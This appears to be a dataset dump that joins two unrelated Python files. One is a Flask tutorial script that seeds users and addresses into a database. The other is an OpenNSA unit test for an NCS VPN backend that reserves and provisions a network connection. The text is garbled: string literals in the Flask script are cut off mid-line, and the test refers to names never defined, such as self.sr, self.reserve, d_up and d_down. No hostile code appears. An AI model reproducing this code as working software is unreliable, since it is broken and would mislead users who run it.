from flask_tut.models import (
db,
User,
Address,
)
app = Flask(__name__)
with app.app_context():
db.create_all()
i = 0
while i < 30:
address = Address(description='Address
db.session.add(address)
user = User(name='User
user.address = address
db.session.add(user)
sleep(1)
i += 1
db.session.commit()
|
data/NORDUnet/opennsa/test/test_ncsvpn.py
|
import os, datetime, json
from twisted.trial import unittest
from twisted.internet import defer, task
from opennsa import config, nsa, database
from opennsa.topology import nml
from opennsa.backends import ncsvpn
from . import common
class NCSVPNBackendTest(unittest.TestCase):
def setUp(self):
self.clock = task.Clock()
tcf = os.path.expanduser('~/.opennsa-test.json')
tc = json.load( open(tcf) )
ncs_config = {
config.NCS_SERVICES_URL : tc['ncs-url'],
config.NCS_USER : tc['ncs-user'],
config.NCS_PASSWORD : tc['ncs-password']
}
self.requester = common.DUDRequester()
self.backend = ncsvpn.NCSVPNBackend('Test', self.sr, self.requester, ncs_config)
self.backend.scheduler.clock = self.clock
self.backend.startService()
database.setupDatabase( tc['database'], tc['database-user'], tc['database-password'])
self.requester_nsa = nsa.NetworkServiceAgent('test-requester', 'http://example.org/nsa-test-requester')
self.provider_nsa = nsa.NetworkServiceAgent('test-provider', 'http://example.org/nsa-test-provider')
source_stp = nsa.STP('ncs', 'hel:ge-1/0/1', labels=[ nsa.Label(nml.ETHERNET_VLAN, '100-102') ] )
dest_stp = nsa.STP('ncs', 'sto:ge-1/0/1', labels=[ nsa.Label(nml.ETHERNET_VLAN, '101-104') ] )
start_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=2)
end_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=30)
bandwidth = 200
self.service_params = nsa.ServiceParameters(start_time, end_time, source_stp, dest_stp, bandwidth)
@defer.inlineCallbacks
def tearDown(self):
from opennsa.backends.common import simplebackend
yield simplebackend.Simplebackendconnection.deleteAll()
yield self.backend.stopService()
@defer.inlineCallbacks
def testActivation(self):
_,_,cid,sp = yield self.reserve(self.requester_nsa, self.provider_nsa, None, None, None, None, self.service_params)
yield self.backend.reserveCommit(self.requester_nsa, self.provider_nsa, None, cid)
yield self.backend.provision(self.requester_nsa, self.provider_nsa, None, cid)
self.clock.advance(3)
connection_id, active, version_consistent, version, timestamp = yield d_up
self.failUnlessEqual(cid, connection_id)
self.failUnlessEqual(active, True)
self.failUnlessEqual(version_consistent, True)
yield self.backend.terminate(self.requester_nsa, self.provider_nsa, None, cid)
connection_id, active, version_consistent, version, timestamp = yield d_down
self.failUnlessEqual(cid, connection_id)
self.failUnlessEqual(active, False)
self.failUnlessEqual(version_consistent, True)
testActivation.skip = 'NCS VPN Test Requires NCS lab setup'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.